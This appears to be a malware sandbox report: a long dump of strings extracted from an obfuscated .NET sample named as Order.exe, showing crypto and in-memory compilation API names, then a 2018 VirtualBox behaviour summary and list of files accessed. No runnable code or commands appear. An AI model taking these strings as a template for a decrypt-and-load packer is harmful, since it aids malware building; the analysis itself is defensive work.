P954OXfG007oaJaMI3K
qJ~b
3{D^
/rq`
?20R
=NTC}
j\"?j}
vG?]G
_br}f
>{nx
J%:,
gx1 2
*+n|
!AIg#\
A-0d
CodeDomProvider
4U `
I)r}
NA,H
rc&w
2Z$e6,o
IDV^#
Mms{e{5R
O@?04u.P
S?;JVM
T>HD(
NP2Iz
l ZY
cryptoStream_0
cyhnX
5}U-
Wvf-oj
AssemblyCopyrightAttribute
U+W?I
[ u@T)
[c?G
6AB?
]MGA1
,K_-
Yx-Sk
d(Bi
/0a+7
+SI2
classthis
)v'63
S1<B#
&}|`
d]`
E>)V6
4H'p:
JYugN
~O V
@948
^+u?y
Infinity
' /O#
W(X-}
da^ko
S )S
5s5e
Y 8
D"@p{
ee)'v
T[O\
}k}2
a/Oy
X#jx
{?89
oflG
FileShare
W">m
o p(
D` )
R`wR)
= +C +?#
RyRH#=
|vJ0
-o"yXK (
B* G
kW%k
pTt
]k4Y
X2O9
tn2-Y
5SA`x
Type
=^YG
|3B:%'
mlhaOqSZnoJKwQloog
| s2G
lhy^
Ad0xtZ
$Nm 0
tgVsq1flqupRYSvQcSc
xb A
X@"1Ay5
FdwB
G ih_
-Oj8
&+!E
&1^@
6i>r
7:b"
H({S
1hCp?
u O$c
.NETFramework,Version=v4.0
q1iFmqAtU`1
r]f^
gsj}
"`J,
gA J(u[!i
aR+o='
$ECv
H#:# o;
/|@]t
nS A
Gw>;<
W]:s
!Pqe
.ur$}
n.3=
- `Hu
Read
{AK<
J5VK
-Em+
0(r:
RIAwK3'=Ja
za{X
v >6
p,gJ
#2x.2v%
Z@ l5
n(\W
4=sK
value__
i"qo
]n__
5rCA
MenuCommand
TabCacheChildrenQuery
uka5qUO1GIEPpIDbysl
S+;0
*OcB
hdcSJwsAvVbeGEQRGmu
qWLM
T)5~V?
rRb}ED35
.kxE
)%tk
#kN>ow
>1 U
BglGP
W"Z%
xe ,
OjcR=
.#"e=
rRb}ED3&
FI5UxxOlQfJ9D5T4Q2u
gAMA
)|'h
yhQw
EmMTMAJK31P5CnaS8j
bS*Dk
O@v$
xTkX
{:Z?
S[[E(
p=A
;2mTb
F4 U(
E[1{
Cdw+ad
8/YUW\
nq%o
u0,c
j7vgIcsxVbG4YcmBw3p
\^^+
n'{5$
yDKI7
.cctor
/ 1#}
AsyncCallback
ktUs
~5te
V]$UT
Gj|+
I5dVKQfWKRle5dZ350S
7mHqv
mscorlib
48Nze
,-r)
runtimeFieldHandle_0
%TB$
Av1.W
)Q7.
;g.g
"EPn
VariantWrapper
mkA
v? 4
jWp-
JJ1K0<.
8gGuJI
T!'./
[5 K=
u}4e
b3fV
*cS&a
set_IncludeDebugInformation
9<g4h 5
E:ZaR
8B =
Oa8whvOQEXFaQqmaIha
2]XL
q
' +`
b98C
13DA
98O$=
GBjqBLMRgfBnCpQIN0
6&4*o
I")/
PSKTn
<ReadAsyncCore>d__30
c$^?>r
RSACryptoServiceProvider
'o!>
6$]-}
1h !
N"9~lM
~DNp}
6sHdG
@UN)
"lj?m
lj6QMwFRD3Amc6Dd1k
m81FBt8ia
*/_G
i iZD
,vkk]M
xfoBuUsz1xmiXtoPXGS
<=hE
}fVaOp
-!&#
2M@h
DayOfWeek
Bs;S9/
/=T73#@
E`_[
O q4o
QqN1
IDX$rk
*
iN1}
*MY0
\2/f
qr}i
fsMRNRzg5E0ffvXLGr
638=j
QhniC7H52Poie5yoPE
method
ogi
PointHtmlWindowCollection
9a_hF
c^AZ
V*JW
2>7L=
Q$i
7.v
IxNr[
OMQZ
R*!tAH
h!G U_4
n3} G
B@vf
''i
wx<X
BQ*'Y
i6e
&L)Y
[8n=
uint_7
r9 b
y ]pv
{wt.|k
JsOtl LX
Z++
bG!0
E;WV
_JM)
{FhT
gtkZy8f1UhiuUZO4cNc
&7s
8!J
hZ i
h/F;iD
T OU
|ayREK
cV|D
int_6
int_5
m634jG2DF4iBM0kOxL
int_3
int_2
int_1
int_0
Fefm
-Y@@ f
ESulFgObNQXxMrqCFp8
cY#.rhs<~
>K!P
iL)y
Tr6K
gJptcvOOsxD0Eyi2kKC
W'H7
:Tj)
v;GLW3~g
Bauc>jjX
n w
rIh5
-0ELj
Q*+P
iC[(
string_2
+%sE
string_1
&+L&
x9gY5Gf5yfiiMfRwbUy
AssemblyDescriptionAttribute
Y:Dn\U
IntPtr
Z.0<
b 8P
E^F+b0
-;&
N s
byte_0
2^dh
Acos
PropertyTab
f/XW6
$$method0x6000007-1
J)5'`
iY/k1
HbYmsAOGOUgxv7BLsf3
IconSize
/j"oi[7
> (]
GG-m_
'x4@
OXf\
VrOSWNfDDNBB9Kni2dB
!xG?
jxH*U
Rfhn M
8.$Y
|+!p
7{7`
qzz{;
.Ss<[bC
percentDecimalSeparator
HI?"
'hp?
t4.+
.N7$
UZ\O
type_0
M<j
4PA<
S `h
p>9DH
-1c[
(H8f
(M(?
&HKK
C" ,
9Ef|6
SoAK
&+ #
\p W
s ~v
n}j{uN
[%e^
IEND
$fbM_/
PV2s
.^Sq
WUMG
! ]'p $
=q{=
"NpZ
`?<
\f.&
RrWnlbCvu
nwa
|1X
&<qD
zZL
s.E1
)SB<
7 A?
CFN>R~
pgxKVFOAE0qE56VHAhy
OdI=oQa[
!\b2
ktX8
get_Message
!This program cannot be run in DOS mode. $
}o%}[
callback
* OpZ
;"qEA
iAwH
File
=mr-y
ty2g22sM9eZRS0spDJf
NL]2
rGwu
xYGcv#_
>9+[p
SystemParameter
LtL|F2{
[fyV
,6+{
`iFZ
u\wu
Dispose
_H>
D1Vu
p%1h
<W/Q/m
:}I%}i1
irAsq
". l
q _#
wuA ;
V9ga
=N `Z
A+8o
k@H
q}hM
IyfJU0L4LPBB3QKiYq
nd t
W{3V
:m%5
p56x
fy]L
pS;
set_GenerateInMemory
kW]l
1 >
ResourceDirectory
yf61
\XQ:
WMDZ
qCOQjFfboXV6ga9x3TQ
b7\
1|EJ"
$$method0x600027b-1
okw^
Jkj
MyY d'
GetValue
ZHwK
#]:cT
G|~/
:4\>x
]j:2
Hs4
goa7XifPDggdGxweBba
j',[
$)V(
tw]<
?YQ2g
1:tj?
a^X<
we\}<~
Uq@<i4
)Zmn
?\n
@ ch
VVn4
@g 'h3
2F:!3
+Hou
?kP"
l'FX
zVc;
C.ao
BSJB
N ?k}
o\:*:
R5u-P
w':u
CU2W
]@1'HE
T01l9YsrWWPS62UXylQ
ZhC}~=
OO1)
/w3Hr
Y@M+
ij @
&o^|]
+S~m
ZQNO
ae8I
LKFB4'
n55+
gekvlYYlUZL06XmD9F
xb 07
op_Inequality
K#6J6
Iedl
GetManifestResourceStream
qX G V[
"X7+
|)1|
y}Acp
cMxuvM
${@)
LJ*)
.{(%
?MS^
uMvQAZsDRhdQx1PJeJY
Ujjl
@ n7>8*
D!G
SRb@D
B\`U
,UF"-
w+pj
!J,-\
"]RL
]:je
MUJW1FroxCQ4ghaCNq
sTyE0
Tk?A
6`L_k
Fe ]l?
}1Fj
/:$4
9-8N
#MHrt:
^[gT
`O$x
*Ay{]qmGURcvc
System.Collections.Specialized
l6LM
Jj$#
pbd|k
gKQ-Y
qM^[
98Q6;
:9}y
C;yi3
2@?h
\fX]?
[<G`
ResolveMethod
RQ6
PQb)
VunpYLtxgAoJHMcFFN
' Pr
J v
'0HHL
ur>U
4_2hQ
Kh).
ld:'+
2tHq
wV]HH
k8^ 3
a&u.
S#]8
!kC()
HA(d
[`$
nXM~
\*Az 4
nw6J
s> -"s
RijndaelManaged
Y2y!
c87_
rRb}ED3
m&a&
)N KR
IjxiElkR07GxpT2Kkn
<Y8%
GetName
TrayNotify
/>K57
CEX}Y%
,;XF
b{Sam
H(E?
Sz`]s=
Struct7
G|ED
s. Y|
Struct2
Struct3
Struct0
Struct1
(]#!
kcyz3
GetProperty
v&.'
WNih\
F ml
6^2fI2
|kQm
@1*`
PpB0Elfzx5CpfBSN12a
.E~>ig,
jaS;
% :m
m_useUserOverride
bool_3
_won
bool_1
bool_0
&+,&
bool_6
bool_5
bool_4
'm $+b:
3) 6GK
cU,}Xt
SignatureWriter
G^'4]
|.0Om
CtBBVKfJhXoZm3MYgie
h@fE
9%k o
d ~Tny
-G0jw;
9M]r
BinaryReader
percentGroupSizes positiveSign negativeSign
;:q4
PtX7yhsUK5f9pH1wV9H
R?;AP
o+Y}{
lY^T
cx 2
/?{
GBT'
^#PTR
gj
8SgH
)P89
yq-z
%;j^
`ia3
t|6$",
4aB{
Tl?
BsC3
zIev=.
aV01rcs2xRYEL9esxPQ
(P
oiDW
;9" J
Cosh
wlEnHBLalS9aRB43fy
8eHx
typemdt
EqO(
_>SR
=[s_
rpXI8EfexjnhFtecrnu
rY3831sGscxddSlwKFF
|([ L:>
`$"
S@(H
] kJ(
zR@3i%
`D!r
7M'L
}5 L&
Q*=|
8 4H=
GlHL
`C>b
pDrD
-*&
b~V3
CompilationRelaxationsAttribute
&*2(
VMciRL9ZcLqyPsstPk
3BV'
m_isReadOnly compareInfo
m<44
o aB
percentNegativePattern
MemoryStream
sE4)A@
AAU
ToolStripDropDownClosedEventHandler
b\p/Rl
brX&
MoXK
Ns'P
NpQ@
Um)
6.iw
IDATS
wKDX
x%?(
`$,>
aQC31ofsK2Y101uECwK
dXz
GkP'
3nicu
YX;!SJkb
3 ?
Ge 1
Qfax
y(qK
!Oa*
qC'sK
7Q Y
G8vVK3fOxK3bkf8RVDZ
|)w
I" P
)d>~u
BaZE
(cFFE^
|L~{
]B~!]
QO)wd
l6l{8
Olc}A
q%1x
ez&G
[b1P
GVDxU2gyiuJMEcjp1R
^t?;R7
\Onw
Mx_
uXf
$+~_4
&Jxf
?ASd
Q%{y
0%%H8G
ifX ?
Attribute0
i(&BF
6, ^?
OrvwxufYZfv5Tj4qJp1
e?3HP^S
Y 2LT
>Cb9
yteMBpNxyFkU
7_k
+{ln
'i?k
XkR2b
O"Bx
(hh
MwcN
hmkL
{u|!
!2YF"
I_WK<
\^QS
|wLp
Qc< 4
0{679
q%1=
%Bd
)!`D
8+b2
.H/
v4>}
yFZROV
Struct6
zB)R.
H{@*
JuOq_
D[KB$
`y>A
#Db/
*8`a|
Struct4
\In1
bJ l
object_0
Struct5
N8>8
Brq*'
A' x@dU
Vj\B
q1'w
9/Ff
)_U\
5jM[e
K\\s
g769WZODbJA1aG7pQB8
sRgFtssYsTpOLk1kyTR
rRb}ED3)+
':^G
6%CG
,Q\l
hUKK}R
,4&
VLZ8
ER^EU
7vhx

0 _t.j
long_1
long_0
W^n(m
'*~w
s1ng
?.P\
Avck>
q%\
sS*p(
Ek}0
mco x
\Z"t5
zdFj
p7{d
p*:A
=>4u
B2zc8yiU
CSharpCodeProvider
memberInfo_0
eg_T
tKyICbrSaUyX
*]Z|
@[Zl
n8Bt
double_0
double_1
h^!(
p{vCB8)
7>JB
2}q
EO:MnI
GetPublicKeyToken
3A/ug
zn
bY;{
PBd<
K:KPo
System.Globalization.CultureInfo
wmP
49PO
EbaRr]un
method_6
"[Tm
CompilerGeneratedAttribute
~{4 LH
shaT
WX+oS
#@=Z
)@nW
Wf~
q|bYk
t [2~
EtF6
y 3$
O*&r
862 8w
X#}.
x_Rt
RT~o
}-|6
9 dYy
^Qn,`
ze@FM
SX9
G 2G
b%|u
zeg
CO{!
-R%q
Copy
WOrA
Bh1aO`>8QcH
' F\N
<CL:
fYHr)1o
System.Text
M{%
get_Unicode
KDy/el
YVMG
ScrollOrientation
Q Z`
!npa^F
NJ2JZafHmWLMYnx8fNd
7yPQ
oi[|
v*4+8;
7@ui
5*CES
zgKvUhDHYilnBaLLGe
.=]
-g5]H
VVC&8
0Zy_
&+0E
[?Un j
flags
DwbmLSOx83VrZcYJJHx
m ]!u8
R &:
>,]`
8%j
*~6OW
knlgymor6WyIEKBhpG
;(_c_
Hj/c|"
f qp
tei
H4J"
o.O;
=`CF
} xx.
7Pg
vhG'U
Class9
Class6
HKb9gSwlc9gCofZdbq
Class4
Class5
Class2
Class3
Class0
Class1
N}D'
&i o
@ :I
!`ge
s[. v
'66
attribute_0
yhsdv3fnwLl8CW88IxI
TtlqMFDZo12LhNdUI6
=}F@e
E[-$9
t@gh%Z
E@J"
YoMTd
(#8I
, Z5
\s9pq
$$method0x600002a-1
$$method0x600002a-2
z>G-
wX8&i
wv5q
hNl}
)+Y+
P-&A
,AaTow'
Wz(b
zhxXwF3GT2sDu4OhRy
$ZO;m
<3JD
DP-O
pSFmd
UW ^t
('6_A7]
Encoding
.?aB;R
T1Ftm6nLqUkeTKqyli
`XOC
jL}0
wC M06
zj&
M98H7
FieldInfo
}uG<
P"uIy
X |&
XVQ!{
<>g.
-0+.
:cp@
!-G@
( %
r.c)Z
7Gi`
*G/
PathList
mK+D
P4qa
zn62
PVT`
Jwm7w2OtepOjkJCb407
JW,T
^2j]
JStao
nYpvOQlRVp4yg7tUO9
SLl;
,E-'
0Aje
_CorExeMain
wo>
w.6p
H=3#
k f>
{Sp?
mWn68D-
t1WiJqscsBRKYoEw1Uo
H~_qQ!
WOlz>
.a>
.>DM
set_Key
usyn[2
byfH
h_<`s
g]Fi
PropertyInfo
G&Y&
'}M J
4'3:"
TKp.
DebuggingModes
InitializeArray
|`jR
[j5`4?Lq ni
`,e@l
2^'&u
d'8-
S-6y
GW )t$
FVqZ
B@!z 7
1ni\|
qgN]
sDR;
hU_
_m0d s
GHJ
<!Qw
GDY
kK 3g
pRT'
ToArray
KhY@
Ph82s^g
'ZEX
U~7~
{%l}
W tmz
mweY
dF'LZ%
` h MI\M
n4<B
uWax
E$rT
y7nqaHOahx84rFKIJuD
^wrI 1
Environment
D3AlpD\
!kBz
Z(C_#cn
B' <
2K|t
`J s
runtimeTypeHandle_0
iQDs
module_1
)xv:}
unT|P
CompilerParameters
w&&:
0O5
lrroMN
-ldqs
{xEW\
MKuk
rRb}ED3(+
\c w<0
dD^b5
(O%%Xh
G0CUA2O8vk8cPCZG6e3
EhgTe
4,kr
~uW`
sIq|!_
MXl3Haf6B3vjBNK6Qgl
}s$X(
l qD
MR;:
3]2]
PfH510exItW8NneGjo
|/Z=
}z5"]
,tC#
info
&`M^i
f$d5s
. Np
i {Ef
rbI]
Tj _1$
Attribute
+9MG
>LKR
=ryH
1}XzQ
P&!_
tUldu
V4M9
^d g
DXeL
w}*"O
_)<{
ubW/
ReadAllBytes
FlagsAttribute
(Dg2\^qF
aelkg
~=s$
BeginInvoke
3(p v\:,
e9sYG
exception_0
[ ;^
k Ie
=Si2]~
jN 6
W$k1ZB
![WrIB
NpD
DebuggableAttribute
>f$9
?FBr
WhCtuGfS6wNn22kPo9e
Mplj
}0\l
CallingConvention
0tcV
3y0LwkxXm9oSCsx74m.18veulde2xReYOYqo3
qcR=
Reverse
nd+0N
bM?
dGU2
$,Lk
NGGJ
nwB
c\ao
(:~@:n
w7q+g
n%:t-
"D!O
RuntimeHelpers
MdnkZWfaXMmFNnV1848
$0qfYc
k?T;dG
@?0E
h-ZM
*~US
uxVD
U=30
methodInfo_0
GM^i
z <cz
G @ x
x|)Oa
&2O
validForParseAsNumber
e
BWn$%
$$method0x6000020-2
109De
Q2"<^
R_\{
8P</
_`Jc
F6 ="
67(<
28C66gEdfyuxjXKM.exe
^Gv2
cO=0
1qKmTb
ed)Sx
'&Q-<+
mz]z[NYF
Object
j0[#9
lvwJ
P%=_a
|uURuuY
XzQ:9
.Y3(
2 Vf
byte_1
Km2?
byte_3
byte_2
eK
byte_4
SNtG
LGnMM
\ bU|
ComVisibleAttribute
]d\)"u
8/:O
*h|v
yNL;@+g6
C|fc
W&Ag
]A0k
s4^
npv)
SqlTceCipherInfoEntry
U={P/
jQ`b
{(Xj:GI
D*jX.
0A!(
=w7
*d>F
N+1 1o
U '
2vHG
ZQSX,
mg;<C
] Zk
l?@ %t
Ti?A =0
|)bgA
zL
z*KZ
tCBU
sh2e
AssemblyConfigurationAttribute
mG =
+xWy
QSystem.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a
1N|(P
MethodInfo
A%$@[
f/'P
V^L7
?!8o
U9p?
F.sO
#I;
gyc8
)2;v$
Z-q(
WB&r
s<Z<
v;'h
[l3eOp
8s#y
h/(m
&+A&+w
fP"t6,
wt+ t
q:c>
s{Iz
]y*P
Hashtable
%System.Globalization.NumberFormatInfo"
2AP2
$UpW u
% [k
!w/ f
2QZre
h]II
Bn-=G
(h,&
GYL4APf92JTvbWmQ4aI
g)Z
Appearance
~ch
TDcj
w c\frM
object_1
^q6'>
jQJLpts3HSFqDB9rr5P
RjZlOYskpkcyj9cwbNC
U<y@B
ApK/
A9ZnL
:UP!%F
(,}&
g)T!
Stream
fSystem.Drawing.Icon, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3ajSystem.CodeDom.MemberAttributes, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089mSystem.Globalization.CultureInfo, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089fSystem.Drawing.Size, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a
=M8S
l'J0\Rm
HQmO
(m$'
J =q
sRGB
GL)gZPc
ReadBytes
pJt.
tBHmZDsVrLx0yR8PXnE
85z`H
hpnX
5{"n
TakeOrSkipQueryOperatorResults
U5 9
module_0
hN*Z
c UH
R7wT
*ADXQ
:c~6
3}'5
4+.4
SOnA/
nJ
Exit
2j~+A
|| $
RK ?13
RrX0oWs1ESNTyWtWhWM
1'/9
e B
i><@J"
K)H7<
4'}
4,I]QQ
{6-C
t'i<
;0WI
( aZ
K#hw
+ufv&
6NjM
s%Cj
yJ|T
k{Mc
>o=
e?>
3X.U
W] k
j(U\
'6r8A
[3)
E)3{
JTh3B6s5Opt4XIOdWLL
]eM3
:jNj
c:K8
F8Ru:
$z@qN
%$D?Z
! &~
T25X3
K6VbrHfXi43maWqPt6Z
$M^5P\)
$]i(
T6VlUEO2tcNCjmAbbvC
cC s.
FtNE
3J-p
BI(g
*.r
percentDecimalDigits
\~{mvb
*ejt}jv[
>`9v
vuiY
XQFnLQsCeqa4lGOdbur
wEZ9]
|R; /
.NET Framework 4
TeFn5P
8QF"
gq_x
Iq(c
j, <3n
{/p^oL
Y+ye
n >f
oe56RSsiy6e3Wum67oH
}"<>
r5k6
Z yh
tFFs9PslbAMcTgAWFMn
a 1|
N\ >
-C^8
NGatnThALYC8d4jDwF
$NX@q3
fmV%
]pUf
2Rj=
SUFG
0[q3
|b:$
<U;E
fK1z{9
(.n
DE z
5uP^
2IJP
D<\r
JfLeK
?Zvto
MVYKLxurvhZFtxH5sG
CAPINative
{;4L4
T) w
@KW
$FM-
X"M,
L35)\
aDTYDRfV4S8SoNVVhAu
rwpNQxPD3y2bDEZNqY
"y<J@
;K{ur
#I,<5
j/ '8-
x q9
qv1V3
I:dm
ValueType
ZeVA
yr;P
]<'
=fM8
*p:=
?+6J
Y!JT
QZ^&
CryptoConfig
fV&
85HW5U
6 >=
n/+]V
J-1i
pv[&
'7 J
nKb
AGdb
m,gTV
|!ZH
@$"
:vQz1
_y.j
dn/
K01l
(@ px8j
9p5W
1>U
2bb
*&?"(
GhA\
B)bG
}YgxF
j=2
$[pIG
^}qM
AesCryptoServiceProvider
CL];
1Jzh~
-F&
xN+:{p
8e:\
1Q;#
,hVa
t^s %)
K}E`
,M=.
.j X
{c
cp9`
;#ZN3
9 |YK
&+Q
o3cLFCfgo61ELpD1nms
*1EL
{YZS
T(1P
As:N
<F,T
s8ji
:YMK
=u0HC
Lh~Kq
+E-2
;qCr
DrueQZsEV8e1MSawJjf
=c m6Hl~
(!*
!hAbM
o1Gi8
lbIO/
B9'$z
91s&
F/hp]
N 9zs
T58]|
B4=hY
^ynV[].
cipherMode_0
9T|
InternalAccessibleObject
~D+?
M"[
cMNj3gBLIi6lpC2bhN
T l64
~p~~>R
:fT>lB>D
Class10
"<ErI
yxZ53YfxUqBisa7il3q
!5W>
K?AR
~Hj8
;o!HtOc
Q7uEdqUTO9brEffSWu
NAc7a
kRXBCBfMKBg9T9ENlUk
VS@@
qCII=
*Q]x{
%}[%
:Z?<
Fgsk
"JBx<,
6+<#
4>4Q
}wWr
|2+\
R|O
VP0
Avt,
dO7.`
kxt"
qi~H
^+a R
0Dh/
q: ;
FH"A
#Z!"
k~x}C
REfEkcCx25uXSKYtea
[l/rx
a7-
qi|c8
negativeInfinitySymbol
48N@
1*)1
+jlr
8c}:
/>5JD
p[?1
YDW91
V-M"P
czq[:
-i9d
jU|KK
&+/&
>Q]hM
2)hE
Exception
tbbO
(}\S?
yNDs
5'Ow
QN v
JEMY
D5M5QYsRfOETpSgvPiF
c2W|
Bf*3
,Gvv
FFW[h
! e{m?
(o&|o
oXMfNvfjHfeb8KiTb5l
D6fohY6WtDPQApLuYW
C2trX`'s
`OC
"H b
=b"4
K3zW5
&xvw
3< E
j.f;
nI:m
N#>C
GetTypeFromHandle
IAsyncResult
nWiNELs9VUEHXGWLXL5
Dr=*
CreateDecryptor
o.;Lc
L1#/=
SymmetricAlgorithm
System.Runtime.Remoting
_yf
\u-
_@l)X
T dQ
U]f\
E(\f
percentPositivePattern
.y r
ReadLine
aR 31
=Q6
s^Cv
!&O)%
ansiCurrencySymbol nanSymbol
, tn
Ei=@
g]w$0
*35P*
5y[m7
kBKy0
U~R`]x
ComputeHash
KugZMfnE6Dc6E3oxlh
j[\VG".
.iJz^M
biy weSIuG
,/{h
%-c(
9 KdKL
RNbO0
:Mg 2<
Qwi"(
aUrsXcmJ _5
g&:[}
YR I
$g(g
_V/8
)&!q
[8O@
YJlg4
C|hZB
Wyf-
UB
NNqp
P&22
FileAccess
+@cC
8 %x
~Or2
/>$
set_Position
OoLf
iNds~
+YrT
b {x5
KATTknspO4RGPtCHagO
j,kQ
?SR'
C O]}
: ,v
'zx:@
Vs-3
System.Runtime.InteropServices
N(=:
| d_
>| w
<K8A<
vT2
u'>\
%gKa
ZaE]CA
Math
UnmanagedFunctionPointerAttribute
-Infinity
W0@}
J;XG
QQU:
y+(U
LL?:
jfe.
fZ5Z]!
r!X>m
.<t!S\
Y8# m)==J
AKMr
+?#
HGbQn'
eyF4
i
QC}}
~':C
symmetricAlgorithm_0
<i|
08!>
D2EQ
}q%i
$\\)
System.Runtime.CompilerServices
%JpV
LzB@D
` u{g
:H 4
Q]&Q\{-
o\mC
6Z@"
tY1y)
rk./
C5Z/
WhIL
r"RO
*TS[P
cBVh
r"wOA
}8P?B
014t
v]P7{LwA
*
gjiTtAf3mbuVvJHP6xl
&*2(
w1Uz
;rAOG
&akGH^
ICf
vLkl
t-^.
SVDr
bool_2
tE2<
Au_`
hsxZ
i~GX
d;cL5o[
UK{,
QYaH2zO
9isk
fQVb
k8x@G$
ufq{
N 3U
/WC
Ocp@L|\
`l`:
BZCr
R3I<{
-M&+y
%QwT
ByIjN=
j2aj*
1r >
zWP .
W{6NVv
-4/*
"ek Tu
^K3O
w#HD
72Lf"
&oPG3Z
R2d"s
6d!)
Close
f`aX
-X q0=
iB3eYwfwmaXJVB9Lvvp
bi>kT7+
IDisposable
xsGe
6,s*
to#
V-v$
tB[/
1IF-
Li@[
set_IV
}gPtT
uVA[T
<SeI
%;-9
Ix>2
CJSt
currencyGroupSizes
w]#Z
m9 _
)aCj
{j1
set_Mode
Ljm#&
W'HE
3Bfv2
MYT]
Q$"#
lU[7q
FA6mnxOyyOUFLoOWCi9
Yb_2
</P "}"
):Hra
qemw
=SSf
AssemblyProductAttribute
Rqr1HP8ARTCHnL2BTV
zK[}
<[.J
@KCwK
,yKZ
6VS
h8:
Av G%a`
?nX/
7a-Rl
+rRZG
opaX
Jvy "]
0i@OX
LY6>
<Module>
akDsN
U"v;2
*F{A5NL
[gl-
F:4e
( L
TH?6
Yn4^
tVgK8dswqNlEm35Q2sx
1w4\
pjQTBnfcUag7LYWgsFo
MulticastDelegate
q"w
VcZ?7s
BbFt
Jg61a
61]\M
l@HDI:
&j%_
h7lYMCfEswpfHOnEh3l
jKaa]=
I&+B H
2;"WyP
c\I
48y('
YP#t
E; "-
B?1$
e#k_
IOoEA
N8wh5
<)[vA
`'(v(
+*4me
uint_3
uint_2
uint_1
uint_0
$2r{C$
uint_6
{m{0
uint_4
sq\9v]
>]p]
ld30
XAOmrRZC1QDB3xhn0i
1Jo$
goV^
DkgrN0stAwu0vrdFIQX
IClrStrongName
A|J4
75j^
p5?o
GMom
sFey+
3iC#
i A.r
h5mj
\7f
jR&d
Xr;!(v
vOk'
P%5pg
Q~0(
CreateEncryptor
;~g7
e%8~
%} /'
currencyDecimalDigits
e 'W
nativeEntry
#GUID
qv'
;VtF
7h6u
assembly_0
R7q$
\d/GJ
f Y@iL
I/0O
?SKH_-
$+'F
TdA/Him
:[Yr
sIQz
y5OZjhNtLjjw8a3I69
ML`8
rJ$q
+@h!
T`@^
9vKw
V" (
[(=:v5
G\4K~(
DataGridViewAutoSizeRowsModeInternal
4 =-
!e2w
yr e
r qnQ
< c|
7S"s
zOJn.
G+z;
Y,MQ
}5 ^
ogW~
91^e
P nnZ
hxfq
:~{l
D89.
TO #
=$ok=Z
kJ)
0`zm
E2{9
&WP#
K2"2
Nullable`1
ShwIyREPlqyTuaWV93
4P;dq
S#p}1
5q'!
PuOPkZSCEyMLq1ARdi
lquZA
/#Ob
^E^ b
c OCV
5?-S
<' e
paC^|
gjuPhycIP
#/)N
System.Globalization.TextInfo
!?M Z
V5 p
get_HasValue
[j-T
= v28
$ L!
E:{#
SqlColumnEncryptionCertificateStoreProvider
{$Y8
Sb/1
8vVQ
">=
M[y{O3]
K9L]
oCETmOs4us5wPKowhGv
bp3a
SetValue
W# K
hE71XfsJ7He4UWCUQj9
+p,Ra
+ <3
&-\UE8
OvV<
/|Wg
cdomimsSA0nZaTZEFnY
xYEN6aBgsh6UH
h!p=
qG}Y?
'Wy^5
GetFields
~1b2K
;!6*
,bp?
KY%n
System.Globalization.SortVersion
t wO
Y}'H
calendar m_dataItem cultureID
:]8.
EjnN6aBBTV3sh
; s;b
?liEk
Th@
tq/^;"6
kk|gv#H
tU;>
t bN-
G<bh
3DCR
q-5
o3Fv
zSg}?
L\c<mX
-F+
`NfSs
/m{#
bN j
iiLR
kt9L
kMY 3
8N@A>
RawImplMapRow
O_r
.zj
?I{4
\ v6
s9D"
K{2+;
v'[zY
@OhWxy`A5.
\~pnP
-|, k
8&SM
)x>0
EbYw
a8I3r9fCrAhv4jCecq4
+mfR
}E0 \
Zero
QWhGs0axFNYsuIO2sl
qIxNu
/!$S
P;G#>rA
e8 S
r+.t
MmEk
!.PND
1i++
hod*
?Leo'
;=MxT>u
km>d
3XJ?
3s4K
raj s
HJVUC
P1Q7LGfmI4KcIOsv81l
Aj,[
pE=Y
d\5w
\sTBT|
Kg955Psy34m9ckraHBP
vsm}
9] +
vI<n
HashAlgorithm
VHUL
_1\{v
wN8@
m~$X
}24%mrr).
TY Q
nDZh
Z"X-
RV>hf
Fs)6=
G 1
l($a
9,E?
>; /5
V0Ib7
[tW
R}v:`B
PlIG
IRgRMTbM4adRCmkSu3
'#OZ
d]m'
wA383jsWUTmWaC8xoHc
r*P
L x&
tu f
VV'&/ W
>0Y}
mPW\
UAdm1awyuxponBElIs
m"|O
H{j~
r='/u{g
F$`=
<[c}Kp
<ParseDtdFromParserContextAsync>d__152
N8EwWhyZWCFq1Cquun
a1#1XE
S}amz
;3dx
#2mt
3VU*
YC}c
1*b-K
$$d"I
N]g
e][3
F'Bn
, &(V
4bKC
uint_5
WriteLine
M& J^tu
/H$
Pg:c
customCultureName m_nDataItem
?_d
_399
hd *
Q|X<
GetMethod
U"b6
0BO"
pb W
1Lp R
Oa)m
Xa^P
*;ct
eQZui2^W
gBaA
S&/ZY
VJPtmXmPohEIBjKg1e
r,_m
a\Rr
+ 2~
UD4
elD3Y
ZIv|8
UPLEDVOi44QpIAuSNEn
&7WH
GDNz
8NPU
NTw'
UEDOetXhWus76oygPv
J49oqdOcWiPeeM4tm2B
MRMDictionary
H?/^
\*n/
thUQ
H}wRi
Psk7e8snDVOKG5Re03W
@ F(
QCjITFvSFKot45HnCw
RUmx
Unwrap
8O6|
su Q
T_&):
\9uf
[K\$
n,Gc
"YmH
-bRf
Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration
Seven04b_64 Seven04b_64 VirtualBox 2018-06-30 16:55:30 2018-06-30 16:58:41 191

14 Behaviors detected by system signatures

Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration
Seven04b_64 Seven04b_64 VirtualBox 2018-06-30 16:55:30 2018-06-30 16:58:41 191

11 Summary items with data

Files

C:\Windows\System32\MSCOREE.DLL.local
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll
C:\Windows\Microsoft.NET\Framework\*
C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll
C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll
C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll
C:\Users\Seven01\AppData\Local\Temp\Order.exe.config
C:\Users\Seven01\AppData\Local\Temp\Order.exe
C:\Users\Seven01\AppData\Local\Temp\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\system\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\api-ms-win-appmodel-runtime-l1-1-0.dll
